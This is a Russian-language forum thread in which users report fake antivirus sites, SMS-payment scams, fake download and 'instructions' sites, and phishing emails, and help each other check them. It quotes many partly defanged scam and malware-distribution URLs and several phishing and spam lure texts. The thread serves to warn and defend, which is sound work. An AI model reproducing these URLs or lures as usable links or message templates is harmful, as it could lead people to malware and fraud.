Ха когда то искал работу набора текста....так везде полный развод и даже текст не меняют объявления...

----------


## Bacardi

> и даже текст не меняют объявления...


Совсем обленились!

----------


## bolshoy kot

_http://windowsproguard.com/
Тоже псевдоантивирус.  :Furious3:

----------


## wowka

Очередной помощник в спасении ВАШЕГО компьютера от вирусов
_____h**p://virusam-net.com/ 

Особенно умилила надпись



> Чтобы получить доступ к услугам сайта, необходимо отправить 3 sms-сообщение. Стоимость sms составляет  300 рублей (около 30 гр для Украины) без НДС. Цены у разных мобильных операторов могут варьироваться. В случае, когда цены указаны в условных единицах (у.е.), то по умолчанию 1 у.е. составляет 32 рубля. Стоимость одного скачивания 15 рублей. Оплата взимается минимум за 60 скачиваний.
> Сервис ____www.net-virusam.com_____ имеет право изменять стоимость предоставляемых услуг, не уведомляя об этом Пользователя................


НО особо  радует следующее  :Smiley: 




> При активации кода абонент получает возможность скачивания бесплатной версии  антивирусной программы  от компании Avira.
> Эмуляция работы сканера на сайте может зрительно отличаться от
> сканирования програмного продукта, который будет выдан абоненту после оплаты. Програмный продукт не является обманом и выполняет функции антивируса в полном объеме.


поди *Avira* и не в курсе, что ее тут за гривны продают  :Smiley:

----------


## bolshoy kot

_http://defencewin.com/
Очередной онлайн-псевдоантивирус.
Никакого соглашения на сайте нет  :Furious3: 

*wowka*, а еще на таких сайтах часто ClamWin продают.

Опа, сейчас зашел на defencewin - "Домен закрыт".
И вот еще:



> http://defencewin.com/][/url]
> Registration Service Provided By: GET-NAMES.COM
> Contact: +380.505664849
> 
> Domain Name: DEFENCEWIN.COM 
> 
> Registrant:
>     PrivacyProtect.org
>     Domain Admin        ()
> ...


Т.е. там используется подмена домена через скрипт? Т.е. в адресной строке написано defencewin.com, а на деле контент - с другого сайта?

----------


## bolshoy kot

_http://www.anti-trojans.info/result/
Находит 4 инфицированных файла и предлагает скачать ClamWin с платного файлообменника.

----------


## bolshoy kot

_http://clam.bir.ru/
_http://antivirus.msk.su/
Опять лжеантивирусы.
Рекламируются баннерами в виде такого же окна, как на самом сайте (где список "вирусов").
Но! Почему "Домен закрыт"? В чем загадка этих сайтов? Почему при заходе на них - домен закрыт?

*Добавлено через 46 минут*

Еще лжеантивирус "WARRING! Microsoft AntiSpyware alert " - _http://www.00011.info/index.php?site=ya.ru
Сам процесс "сканирования" _http://www.00011.info/scan/ - обычная флеш-анимация
_http://www.00011.info/result/ - результат всегда один, 4 вируса
_http://nakachali.info/file.php?id=65345&site=ya.ru - а вот и скачивание антивируса

Отправьте SMS-сообщение с текстом 304484 на номер 4460 
(Если не отправляется, попробуйте отправить на номер )

*Добавлено через 1 минуту*

_http://trojan-scanner.info/

----------


## bolshoy kot

_http://virus-scann.com/

----------


## valho

> Но! Почему "Домен закрыт"? В чем загадка этих сайтов? Почему при заходе на них - домен закрыт?


1 - там работают только реферальские ссылки
2 - у меня ещё есть смутные сомнения что они боятся, почему то, каспера который вероятно умеет блочить само название, но не понимает наподобие авсканер.сом/я васяпупкин.всемпривет, а так они работают все несмотря на надпись что он закрыт.

----------


## bolshoy kot

_http://windowsprodefend.com/

Насчет "реферальских ссылок" - а как же передается сайту номер реферала? Ведь чего-то типа "index.php?setting=value", характерного для GET-метода, тут нет. Значит, с баннера идет POST-запрос? Да и почему в whois написано "Locked".
Мне кажется, что средствами JavaScript открывается окно, в котором адрес указан для вида, а на деле контент идет по JavaScript.

А вообще эти псевдоантивирусы уже надоели  :Furious3:  Начались эти "Мои компьютеры" (именно такой заголовок у сайта псевдоантивируса) с партнерки smskorovka. На тех сайтах даже было соглашение (правда, "чайник", который при слове "вирус" начинает жутко паниковать, даже не заметит эту ссылку). Теперь же smskorovka больше не имеет таких сайтов (можно посмотреть на _smskorovka.ru), но появились сайты-клоны тех сайтов. На них уже нет соглашения и номер, куда слать SMS - 1350. Также отличительная особенность сайтов в том, что при прямом заходе на них - "Домен закрыт".
Еще есть другие сайта такого типа. Очень кривой дизайн там. При загрузке там проценты (а не круговой "индикатор") и номер 4460.

----------


## valho

> Насчет "реферальских ссылок" - а как же передается сайту номер реферала?


Ну значит это не реф, а чей то ИД

----------


## Joyman79

Еще один псевдо-антивирус  :"http://": compguardlabs.ru/

----------


## wowka

Подскажите - вроде есть базы "черных" зараженных серверов (с которой браузеры сопоставляют запросы и если, что ругаются)? Как туда адрес вставить

У меня в Аське есть адреса моих друзей, которые взломаны, я их не удаляю - и оттуда я получаю линки на свежие и не очень вирусы, рекламный спам и проч.
Один адресок повторяется с завидной регулярностью
[email protected]@p://icbleu.com/video/00300/   (точнее .../video/ цифры могут меняться) - вирус (.scr) запакован и что бы им заразиться нужно его скачать, раззиповать и запустить

Кстати - вирусяки там бывают и новенькие, которые не берут еще текущие антивирусы (точнее модификации, старых  :Smiley:  )

Вот и думаю, куды стукнуть на ресурс

----------


## bolshoy kot

> [email protected]@p://icbleu.com/video/00300/   (точнее .../video/ цифры могут меняться) - вирус (.scr) запакован и что бы им заразиться нужно его скачать, раззиповать и запустить


Кстати, такой сайт я уже видел. Там помимо SCR-вируса еще C:\WINDOWS\Media\sound.exe (блокиратор, отправьте SMS) эксплоитом через IE ставился.

----------


## Buldozer

снова боты :Angry: 



> Узнаа хоть меня? если нет вот фотка _http://xseksx.ru/x/dl/53/foto.jpg 
> вот ищё фотка _http://xseksx.ru/x/dl/53/foto.jpg

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## koe-kto

Что это вбруг Каспер на Яндекс ругаться стал? Это фолс или что?

----------


## Torvic99

Вот сегодня нод32 тоже начал ругаться на сайт - 



> 23.03.2010 11:26:37 - IMON - Интернет-монитор Инициирована программная вирусная тревога на HTO: mobile.gorod.dp.ua/ инфицирован HTML/ScrInject.B.Gen вирус.

----------


## Гриша

> снова боты


*Trojan-SMS.J2ME.Jifake.p
*

----------


## bolshoy kot

_http://www.eaclub.ru/BRAINQUIZ/tabid/257/Default.aspx
Прикольный тест  :Smiley:

----------


## Зинка

У меня установлен Avira Avtivir Personal.
С красным зонтиком в SysTray.

Недавно сказал, что хочет перейти на 10-ю версию.
Послал сюда:
http://download.cnet.com/Avira-AntiV...dlPid=11012914

Я скачала, но что-то мне там показалось подозрительным. Например - предложение установить арабский шрифт.
Поэтому пока не инсталлировала.

Это нормальное место или нет ?

----------


## valho

> Это нормальное место или нет ?


Вы скачайте эту авиру, а на самом сайте авиры возьмите контрольные суммы, если всё окажется пучком то будем считать, в какой то степени, всё нормально  :Smiley:

----------


## Зинка

> Вы скачайте эту авиру, а на самом сайте авиры возьмите контрольные суммы, если всё окажется пучком то будем считать, в какой то степени, всё нормально


Не поняла, как сравнить контрольные суммы.

----------


## valho

> Не поняла, как сравнить контрольные суммы.


Скачайте, например http://portableapps.com/apps/utiliti...d5sum_portable 
В этой программулине добавьте скачанный дитрибутив там где поле - File name, он покажет контрольную сумму. Что бы сравнить её с той суммой которая на авире, идём туда http://www.free-av.com/en/download/download_servers.php
Нам нужно



> *Avira  AntiVir Personal - FREE Antivirus*
>  *Download English installation kit* 
> *Avira AntiVir Personal - FREE Antivirus, Version  10*


В программулине ставите в поле - compare номерочек там на данный момент a0f890049aa9870a296a4969f7015334 и жмёте кнопочку - compare, если всё нормально то выдаст  "MD Check Sums  are the same"

----------


## Зинка

> Скачайте, например http://portableapps.com/apps/utiliti...d5sum_portable 
> В этой программулине добавьте скачанный дитрибутив там где поле - File name, он покажет контрольную сумму. Что бы сравнить её с той суммой которая на авире, идём туда http://www.free-av.com/en/download/download_servers.php
> Нам нужно
> В программулине ставите в поле - compare номерочек там на данный момент a0f890049aa9870a296a4969f7015334 и жмёте кнопочку - compare, если всё нормально то выдаст  "MD Check Sums  are the same"


Спасибо !
Сошлось !

----------


## wowka

Ну вот  :Smiley:  Очередная Avira за 1000 рублей  :Smiley: )))))))

_______http://antivirus-fast.com/

----------


## bolshoy kot

_http://dvderotika.y2707s.z43.poisk125.com/text4/?wm=12345671

Мобильная подписка (ВНИМАНИЕ: Не вводите там номер телефона - будут списывать деньги! См. правила использования сайта)

----------


## Bacardi

> Мобильная подписка


А если там мошенники введут чужой номер телефона?
ммм?

----------


## Jolly Rojer

Просто так ни чего списываться не будет... на введенный номер скорей всего придет смс с предложение отправить смс на короткий номер...пока Вы смс не отправите ни чего списываться не будет, нут кроме пополнения базы телефонов для дальнейшей рассылки.

----------


## Bacardi

> смс с предложение


или ммс со ссылкой (вроде как фотография от какого-то друга)!
 :Wink:

----------


## catmen08

Новая разновидность спама вконтакте:
Имя:
Андрей Кудашов
Сообщение:
Здравствуйтe Дима, я прeдстaвитель кoмпании Amedia. В данный момент мы набирaeм себe пeрсонал и Вы пoпaдaeтe под наши критeрии. Если заинтeрeсовaлa, подробней о нашиx вaкансиях можeте узнать здeсь -  :"http://": loves.myftp.org/?r=7971939 Нaдеюсь на дaльнейшee сoтрyдничeство.

----------


## bolshoy kot

_http://instrukcija.info/

----------


## Bacardi

> мы набирaeм себe пeрсонал





> loves


Любовный персонал ...

----------


## bolshoy kot

Вот очередной сайт с "инструкциями": _http://instrucciyarus.info/
При вводе любого запроса (например, я ввел "электробритва") выдает:

Внимание! Инструкция найдена!
Название документа:
электробритва.doc	
Размер документа:
7388 Kb	
Тип документа:
Microsoft Word	
Дата загрузки в базу:
Wed Feb 03 2010	
Файл проверен Dr.Web:
Вирусов нет!

и дает ссылку _http://instrucciyarus.info/download.php?query=%FD%EB%E5%EA%F2%F0%EE%E1%F0%E8%  F2%E2%E0

По ссылке качается файл _http://rapidsharos22.info/download2/61/1359/elektrobritva-1278456084_611359.exe (размер - 8,6 Мб)

Иконка WinRAR-овская. Что внутри - не знаю (вирус? платный SFX?)


Вот еще один такой сайт - _http://instukzia.com/poisk/

Вот куда перебрасывает с него - _http://www.instukzia.com/poisk/download.php?query=%D0%BF%D1%8B%D0%BB%D0%B5%D1%81%  D0%BE%D1%81 и _http://super-filez.org/download2/60/1340/pyilesos-1278456272_601340.exe (поисковой запрос - "пылесос").

----------


## Alexey P.

> Иконка WinRAR-овская. Что внутри - не знаю (вирус? платный SFX?)


 Да, платный SFX. Tool.SMSSend.

----------


## wowka

Подружка Кликнула по ссылке, любезно пришедшей ей в одно сообщении ВКонтакте  :Smiley: 
Ясен пень, не может зайти в свой аккаунт СМС хотят.... вот куда ее перенаправили

h___p://www.photo85.www.vk.com.www2in.net

Грузится с этой странички нечто под названием foto15.src  :Smiley:

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## olejah

Раз гругится нечто - ссылку активную лучше деактивировать. А то найдутся любопытные.

----------


## Alex_Goodwin

> Грузится с этой странички нечто под названием foto15.src


http://www.virustotal.com/ru/analisi...127-1278580387

----------


## AlexGOMEL

Кому какая нужна документация? :-D
h__p://instrucciyarus.info/
Вне зависмости от запроса получаешь один и тот же файл, но с запрашиваемым именем.

----------


## bolshoy kot

_http://gostosbor.ru/kimohyly1661.html
Очередные "инструкции".

*Добавлено через 48 минут*




> Подружка Кликнула по ссылке, любезно пришедшей ей в одно сообщении ВКонтакте 
> Ясен пень, не может зайти в свой аккаунт СМС хотят.... вот куда ее перенаправили
> 
> h___p://www.photo85.www.vk.com.www2in.net
> 
> Грузится с этой странички нечто под названием foto15.src


http://www.threatexpert.com/report.a...e38c0ec1698581 - вот описание этого файла.

----------


## bolshoy kot

Искал источник вируса Winlock, а нашел _http://188.72.239.130/profile.php - фейк ВКонтакте, который используется, видимо, в связке с изменением hosts-файла при помощи трояна.

----------


## bolshoy kot

_http://www.songlect.ru/search.php?q=1

Псевдопоисковик "Positiv Files". Для пущей убедительности подставляет картинки. Предлагает какой-то многомеговый EXE. Платный SFX? Вирус? Блокиратор?

----------


## bolshoy kot

_http://www.automobilesites.ru/promo.php?q=cats

----------


## Зинка

Получила сегодня несколько писем от разных авторов, якобы через LinkedIn,
а на самом деле ссылки ведут на 
http://cyclestrongman точка com/x.html

Страница не открывается

При наборе такого адреса в Гугле получила сообщение



> У нас есть основания полагать, что запрошенная вами страница может нанести вред вашему компьютеру или использоваться для хищения личной информации. Вы можете открыть ее на свой страх и риск.


Уважаемые знатоки, что это было ?
Если я уже нажимала на эту ссылку - что делать ?
А меня антивирус Avira Personal

----------


## valho

> А меня антивирус Avira Personal


половину он там не видит, удалите адрес

http://www.malwareurl.com/listing.ph...opdotami.cz.cc
http://safeweb.norton.com/report/sho...opdotami.cz.cc
ещё там чё то есть...

----------


## grobik

> что это было ?
> Если я уже нажимала на эту ссылку - что делать ?


Это было легкомысленно принятое Вами предложение шутки ради прописать у себя бригаду друзей (скрин именно оттуда)  :Roll Eyes (Sarcastic): .
Для избавления от 57-ми псевдотроянов загрузили бы 57 настоящих.

В этот раз повезло,Вы увидели уже _Error 500_,а не сканер, старайтесь впредь не открывать послания 


> от разных авторов.

----------


## Зинка

> Это было легкомысленно принятое Вами предложение шутки ради прописать у себя бригаду друзей (скрин именно оттуда) .
> Для избавления от 57-ми псевдотроянов загрузили бы 57 настоящих.
> 
> В этот раз повезло,Вы увидели уже _Error 500_,а не сканер, старайтесь впредь не открывать послания


Спасибо !
Я обычно не открываю. Тем более, что в графе "кому" - не мое имя было.
Случайно получилось.

*Добавлено через 12 минут*




> половину он там не видит, удалите адрес
> 
> http://www.malwareurl.com/listing.ph...opdotami.cz.cc
> http://safeweb.norton.com/report/sho...opdotami.cz.cc
> ещё там чё то есть...


Спасибо. 
Завела туда указанный мной адрес - ничего нет.
Наверно потерли уже.

----------


## Зинка

Вы будете смеяться, но я задам вопрос про сайт тель-авивского аэропорта
http://www.iaa.gov.il/RASHAT/en-US/A...x?AorDFlight=D
Нажатие на кнопку "All Fligths" или на кнопки сортировки приводит к сообщению Эксплорера
"Сведения, переданные в интернет, могут быть доступны другим пользователям".

Какие "сведения" я передаю, пользуясь обычным расписанием ?
На других сайтах - такого нет.
Может там правда какая-то хитрушка ?

Кстати, Фаирфокс не ругается, только Эксплорер.
Еще совсем недавно ФФ вообще не хотел показывать эту страницу.
Сейчас смотрю - заработало.

----------


## valho

Похоже его крякнули.  :Smiley:

----------


## Joyman79

:"http://": comp-antivirus.com/?pid=12

----------


## Зинка

Получила такое письмо



> Добрый день!
> Ваш аккаунт был заблокирован, за рассылку писем.
> Вам необходимо пройти принудительную процедуру по активации во избежании потери вашего аккаунта
> Для активации профиля перейдите по ссылке и выполните указания: 
>   http: //plolkdjhkllh. h1. ru/
> C уважением служба поддержки
> Одноклассники.ру


Нортон нашел там сразу 139 угроз.
Будьте осторожны, товарищи.

"Свойства"  письма:
Return-path: <[email protected]>
Received: from [81.177.6.213] (port=34204 helo=srv36-h-st.jino.ru)
	by mx41.mail.ru with esmtp 
	id 1P5qxG-0001rG-00
	for [email protected]; Wed, 13 Oct 2010 06 :20: 34 +0400
Received-SPF: none (mx41.mail.ru: 81.177.6.213 is neither permitted nor denied by domain of srv36-h-st.jino.ru) client-ip=81.177.6.213; [email protected]; helo=srv36-h-st.jino.ru;
X-Mru-BL: 0:0:0
X-Mru-PTR: off
X-Mru-NR: 1
X-Mru-OF: Linux (ethernet/modem)
X-Mru-RC: RU
Received: by srv36-h-st.jino.ru (Postfix, from userid 1055)
	id D531F38628C; Wed, 13 Oct 2010 06 :20: 34 +0400 (MSD)
To: ******
Subject: аккаунт заблокирован за спам
Content-Type: text/plain; charset=windows-1251
From: odnoklassniki.ru <[email protected]>
Reply-To: odnoklassniki.ru <[email protected]>
X-Mailer: PHP
Message-Id: <[email protected]>
Date: Wed, 13 Oct 2010 06 :20: 34 +0400 (MSD)
X-Spam: Not detected
X-Mras: Ok

----------


## Bacardi

> Subject: аккаунт заблокирован за спам


Как же это он так заблокирован, что *Зинка* все-таки получила письмо?

----------


## TOsha

_https://www.skydns.ru/ - посмотрите пожалуйста. Оформление настораживает..

----------


## valho

> _https://www.skydns.ru/ - посмотрите пожалуйста. Оформление настораживает..


Та пойдёт, только будет потом написано что это бета-версия, мне письмо пришло от этих, чёт найти немогу, ideco-software.ru, что это ихний.

----------


## bolshoy kot

_http://skachaivse.com/ - очередной псевдопоисковик файлов. Теперь схема "развода" немного изменена - вместо пароленного SFX-архива требуют SMS прямо на самом сайте, с имитацией окон "скачивания" файла.

_http://girlsxxxplay.info/ - опять порнокодек. "pornoplayer.exe"

----------


## Bacardi

Из мэйл-агента:

Пpивeт. От тебя чacто пpихoдит приглaшeние нa порнocaйты. Уcтанови себe зaщитy от кpaжи пaрoлей  :"http://": //ur1.ca/2og0z , пoтoмy чтo администpaция ckоpо удaлит твой eмэйл за cпaм. Мой ужe удаляли.

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Lexxus

:"http://": willabyvada.land.ru/9.html

Подделка под deposit 



Будьте бдительнее, или ставьте Linux, как я  :Smiley:

----------


## valho

Тырят номера сотовых телефонов, от дурной головы другая операционка не спасёт

----------


## AS007

Подделка под RapidShare.ком, используется похожий интерфейс, только ссылка по другому пишется
Так выглядит картинка немецкой рапидшары

а так с этого обменника  - rapidaloads4.ру 

но суть в другом, какой бы вы файл не взялись скачать, 100кб, 100мб или 1гб, качается один и тот же файл размером 20,0 МБ (20 971 520 байт)
На вирустотале не проверишь, потому что файл больше чем 20мб

Там же на сайте, можно найти* Пользовательское соглашение*
.......
оплата осуществляется с помощью отправки 3 смс сообщений на короткий  номер ХХХХ. После отправки третьего сообщения абоненту предоставляется  полный доступ ко всем возможностям сервиса. Стоимость 1 сообщения на  короткий номер ХХХХ для абонентов Ххххххх - 300 рублей с НДС ...
.......
Отдельно, администрация сервиса информирует всех заинтересованных лиц, что:
  1.    Владелец не несёт ответственности за предоставление Пользователю  некорректных результатов поиска в случае инициации поиска по  некорректным и (или) заведомо для Пользователя несуществующим исходным  данным файлов.
  2.    Владелец не несёт ответственность за технические и иные проблемы в  сетях передачи данных, на оборудовании Пользователя или третьих лиц, а  также за информационное содержание файла, размещённого на  торрент-трекерах, найденного по запросу Пользователя.
  3.    Владелец не несёт ответственность за возможные негативные  проблемы, связанные с функционированием телефона или ЭВМ Пользователь.
  4.    Ответственность за возможный моральный ущерб, связанный с просмотром медиафайла, несёт сам Пользователь.
  5.    В случае, если Пользователь не выполняет хотя бы один из пунктов  настоящего Соглашения, но инициирует отправку СМС, услуга считается  выполненной и должна быть оплачена в полном объёме, однако Сервис  оставляет за собой право в дальнейшем отказать Пользователю в  предоставлении услуги без объяснения причин.

----------


## bolshoy kot

_http://updateflashtoday.info/
Вот так этот сайт рекламируют:

----------


## wowka

очередной альтруист  :Smiley:  
a-scanz.info
Сделан топорно, находит конечно же тучу вирусов, сразу просит Денег

----------


## wowka

Гляньте на _____http://latest-update.info/
В последнее время очень часто эта фигушка стала выплывать при серфинге...
Предлагает обновить браузер - кто в теме, может подскажете, что он установит

----------


## AS007

> ...
> Предлагает обновить браузер - кто в теме, может подскажете, что он установит


После клика на кнопке - *Установить* 


> Для скачивания программного обеспечения необходимо ввести номер телефона
> Код активации придет на ваш мобильный телефон,для скачивания обновлений необходимо отправить 3 смс сообщения
> Введите ваш номер телефона


 Вот что простит  :Smiley: 
После ввода номера, типа +79005550000


> Запрос на создание кода сформирован. Необходимо подтвердить ваш возраст.
> Вам было отправлено смс-сообщение. Вышлите в ответ на присланное сообщение ваш возраст, после чего мы сможем вам выслать код активации.

----------


## Nvidia

> Из мэйл-агента:
> 
> Пpивeт. От тебя чacто пpихoдит приглaшeние нa порнocaйты. Уcтанови себe зaщитy от кpaжи пaрoлей :http://ur1.ca/2og0z , пoтoмy чтo администpaция ckоpо удaлит твой eмэйл за cпaм. Мой ужe удаляли.


Именно так и распространяются лжеантивири :Smiley:

----------


## Nexus

Таки наткнулся на интересный развод... :Smiley: 

Пообщался с ботом вконтакте, который пишет в лс от друга. Пишешь, а он сразу отвечает - подозрительно) 


Собственно, по ссылке открывается псевдо-ютуб, якобы с видео, предлагающий обновить\скачать флеш плеер))
Причем, где пробелы, там отображается твоя реальная фамилия, а в комментариях реальные друзья вконтакте = ) Браузер для входа использовался не основной, т. е где я не залогинен вконтакте.
Выглядит у меня так

Если общий шаблон (любой другой id, не свой), то

http://www.virustotal.com/file-scan/report...0bab-1307088256
http://camas.comodo.com/cgi-bin/submit?fil...903262603cf0bab

Принцип сей работы сайта, я не анализировал. Поэтому кому интересно, в лс кину ссылку. Так что не ведитесь, и будьте осторожны!  :Roll Eyes (Sarcastic): 
Сэмпл разослан в вирлабы, естественно.

----------


## Val_Ery

Давненько я поиском не пользовался... Думал, сия зараза покинула пределы интернета...
____http;//antinet.ucoz.net- с вариантами:
4.jpeg6.jpeg
Линки через __mediarich.ws на ___http://browseryourupdatinnow.info/ и на ___http://myantivirdefendz.info/

----------


## bolshoy kot

Пришло в почту:



> С 2ОО9 гoдa продуктивно работает сepвис "Бyдь на связи".
> 
> Принцип paбoты весьма прост:
> 
> основные операторы мобильной связи отключают центральное
> оборудование в Hoвoгoднюю ночь, но оставляют peзервное,
> предназначенное для белого списка номеров. 
> Наш pecypc позволяет добавить Ваш номер телефона в этот список. 
> budnasvyazi.do.am
> ...

----------


## Alexey83

Случайно прошёл по ссылке в спаме пришедшем на почту, что интересно сайт так и не открылся, подумал вирус рассылают, проверил ссылку на http://virusinfo.info/ но и там ничего не обнаружено. Смысл высылать такую ссылку, может кто из знающих проверит её datinge.ru/index.php нет ли там вирусов?

----------


## Зинка

Ребята, подскажите, что с сайтом российского МИД (ни много ни мало) ?
Вот отсюда
http://telaviv.kdmid.ru/wiki.aspx?ls...%D0%B9%29.aspx
(все пока нормально)
захожу по ссылке 
http://passportzu.kdmid.ru/
Там заполняют анкету на обмен загранпаспорта.
Получаю сообщение от FireFox



> Это соединение является недоверенным
> 
> Вы попросили Firefox установить защищённое соединение с passportzu.kdmid.ru, но мы не можем гарантировать, что это соединение является защищённым.
> 
> Обычно, когда вы пытаетесь установить защищённое соединение, сайты предъявляют проверенный идентификатор, служащий доказательством того, что вы направляетесь в нужное место. Однако идентификатор этого сайта не может быть проверен.
> 
> Что мне делать?
> 
> Если вы обычно без проблем соединяетесь с данным сайтом, эта ошибка может означать, что кто-то пытается подменить этот сайт другим. В этом случае вам не следует продолжать соединение.


Недавно были сообщения
http://lenta.ru/news/2012/03/13/hacked/
"Палестинские хакеры взломали сайт посольства РФ в Израиле"
Как узнать, можно ли заходить на эту страницу ?

----------


## valho

Там установлен SSL сертификат с проверкой домена, посмотрите отпечаток, в Firefox - просмотр сертификата - отпечаток SHA-1 4d 9a 21 b9 c2 07 a9 c9 4b 7a 4a 4d 40 fe 71 bf 16 9b 7f be 
Большие, маленькие буквы без разницы.
Если сходится то можно считать, грубо говоря, что всё нормально.

----------


## Зинка

> Там установлен SSL сертификат с проверкой домена, посмотрите отпечаток, в Firefox - просмотр сертификата - отпечаток SHA-1 4d 9a 21 b9 c2 07 a9 c9 4b 7a 4a 4d 40 fe 71 bf 16 9b 7f be 
> Большие, маленькие буквы без разницы.
> Если сходится то можно считать, грубо говоря, что всё нормально.


Спасибо.
А можно немножко подробнее для блондинки: как Вы получили этот код и где он должен "сходиться".
Что нажать в Firefox ?

----------


## valho

> Спасибо.
> А можно немножко подробнее для блондинки: как Вы получили этот код и где он должен "сходиться".
> Что нажать в Firefox ?


Попробуйте как на картинке, добавить в исключение, далее кнопка - просмотреть... там будут указаны отпечатки SHA1 и MD5.

kdmid.jpg

----------


## Зинка

Сделала "как на картинке".
SHA1 и MD5 - не совпадают.

Что с чем должно "сходиться" ?

----------


## valho

А кто сказал что они должны совпадать?

----------


## Зинка

> А кто сказал что они должны совпадать?


Объясните ж наконец, что с чем ДОЛЖНО совпадать.
Не надо объяснять, что НЕ должно.
Как проверить правильность этих кодов ?
Можно ходить на этот сайт или нет ?

----------


## valho

> Как проверить правильность этих кодов ?
> Можно ходить на этот сайт или нет ?


Правильность проверить только по отпечатку SHA1 которую я Вам написал.
На сайт заходить можно.

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Зинка

> Правильность проверить только по отпечатку SHA1 которую я Вам написал.
> На сайт заходить можно.


Спасибо.
Правла так и не поняла, где Вы его взяли и почему лисица ругается.

----------


## agent_smith

Всем привет!
Если кому интересно.Сегодня зашел с андроид-устройства на сайт fishki.net в категорию анекдоты.Вылезло гневное окошко об обновлении браузера,типа срочно обновите,версия браузера сильно устарела,естессно делать ничего не стал,но посмотреть захотелось.Смотрел из под VirtualBox.В винде никаких окошек не появляется (видимо кака предназначена для мобильных устройств),имею ввиду страницу h..p://anekdot.fishki.net/,но на сам сайт зайти естественно можно,ссыль h..p://operbrawd.com/.Онлайн сканер оценил саму страницу как безвредную.Ссылки на закачку браузере (или чего там) не проверял.На сайте имеется пользовательское соглашение,в котором речь идет вообще о сайте free-games-all.com ,каких то оплатах посредтвом смс и ни духом ни о каком браузере.

----------


## Зинка

Кажется я снова вляпалась.
Получила вот такое письмо




> Hello ***
> 
> 
> The security questions and answers for your PayPal account were changed on Feb 23, 2016.
> 
> If you did not authorize this change, please contact us immediately using the phone number found on the following page:
> 
> 
> Log In Now
> ...


И сдуру туда полезла, потому что таки пользовалась в это время PayPal и меняла вопросы.
Попала сюда:
http://www-paypal.com-webapps-mpp-ho...locale.x=he_IL
Набрала мэйл и пароль.
Войти не удалось, было сообщение типа "сервер перегружен".

Завела этот адрес на https://www.virustotal.com
И получила такой ответ:
Kaspersky: 	Phishing site
Все остальные - "чисто".

Братцы, помогите разобраться !
У меня уже сперли пароль или еще нет ?
Кто активно общается с paypal ?
Я очень редко пользуюсь.

----------


## n-igorevich

Нигде и никогда не вводите личных данных, телефонов, карточек. Кроме тех сайтов которым доверяете на 100%. Смс мошенничество это уже позапрошлый век, но народ до сих пор ведется  :Smiley:

----------


## Webberz

Так а что они смогли натворить или вы поменяли доступы?

----------


## Зинка

Я искала одну книжку.
Попался очень странный библиотечный сайт.
http://e-s-ulare.ru/cat/7982/10/
(минусы убрать)
Скачала нужную книжку. В формате RAR.
Открываю - а там какой-то реферат "1. США в годы экономического кризиса 1929 — 1933 гг."
Попробовала скачать другие книжки из этого же раздела. файл 112933.rtf
Во всех файлах - тот же реферат.
Попробовала выйти в другие разделы.
То же самое.
Что бы это значило ?

Спросила у VirusTotal
Не ругается.
Но там перед тем, как скачать книжку, сайт выдает окошко



> Вопрос: четыре плюс два равно (числом)...
> Введите ответ:


Может в этот момент - происходит какая-то гадость ?

----------


## akok

Во вложении отдается адварь которая является он-лайн скачивателем файла. https://www.virustotal.com/#/file/45...aa52/detection 

Файл имеет легитимный сертификат, поэтому если нет детекта в антивирусных базах, то антивирусы должным образом не отработают


```
CN = OOO_START-SERVIS
O = OOO_START-SERVIS
STREET = Frunze, 96
L = Samara
S = RU
PostalCode = 443099
C = RU
```

- - - - -Добавлено - - - - -

Если есть желание
https://www.hybrid-analysis.com/samp...ironmentId=100

----------


## Зинка

*akok*, спасибо !
Но, видимо, информация для более грамотных, чем я.
Это опасно ?
Как выводить его ?
И почему у этих жуликов - легитимный сертификат ? Его теперь отберут ?

----------


## akok

> Это опасно ?


Опасно.



> И почему у этих жуликов - легитимный сертификат ? Его теперь отберут ?


Это прибыльный бизнес  :Smiley:  Скачивая файлы, вы соглашаетесь....... это тот момент когда интересно читать пользовательское соглашение.

- - - - -Добавлено - - - - -

Большая проблема в том, что зловредов могут отдавать таргетированно, т.е. каждому свое. Проверьте систему adwcleaner для успокоения, или обратитесь в местный раздел лечения для диагностики.

----------


## Зинка

*akok*, 
Спасибо, я попробую.

А можно этот сайт внести в какие-то "черные списки" ?

----------


## akok

Можно попробовать отправить ссылки и описание ситуации в вирлабы, может добавят детект.

----------


## smolka100

вот это что за странный сайтик.  tqejwgr.xyz
 я подвисла. искала о себе инфу через поисковик и офигела. понятно что левый, но с какой целью такое создается - не пойму. может тут вирусы  есть? помогите разобраться

----------


## olejah

*smolka100*, вредоносов вроде нет. Обычная помойка, мошенническая, скорее всего.

----------

smolka100

----------


## valho

336d2a0f3098c4614d69179ea3002e67.png
*smolka100*,  Сорри, это Вам. Забыл процитировать, а то непонятно будет.

----------


## Зинка

Случайно зашла на сайт
https://ru.gridinsoft.com
Искала старую добрую игрушку Lines.
Вместо этого скачалось и установилось какое-то antimalvare.
Теперь оно в "диспетчере задач" жрет немеренно процессорного времени и памяти.
И не могу удалить.
В списке приложений - не вижу его.
Дело осложняется моим слабым знанием Win10.
На предыдущем компе была "семерка".

Купила новый комп несколько дней назад.
 Dell-Optiplex-7070, память 16 ГБ, процессор i5, SSD-512 ГБ, грех жаловаться.
Летал как пташка до этого  antimalvare.

Кто-то знаком с этим сайтом ?
Может он взломан ? Может фирма уже померла, а на ее месте - вирус ?

----------


## valho

> Случайно зашла на сайт
> ru.gridinsoft.com
> Искала старую добрую игрушку Lines.
> Вместо этого скачалось и установилось какое-то antimalvare.


Пустышка там какая то ставится, якобы антивирус. Разработчики из Украины, вроде. Находит тонны вирусов в ярлыках. Ставит какой то драйвер в систему gsInetSecurity, может ещё чего делает. Лучше обратитесь за помощью, здесь в соответствующий раздел.

----------


## Зинка

Спасибо !
Я вроде деинсталлировала то, что поставила gridinsoft.
Заодно убрала и антивирус Маккафи. Сейчас подумаю, что поставить.

Уже сделала файлы для просьбы помощи, но подожду еще.
Вроде сейчас машина не тормозит.
В диспетчере задач  в "процессах" имеется строка Antimalware Service executable
Берет половину процессорного времени.

Нажимаю правой кнопкой "открыть расположение файла".
Выдает
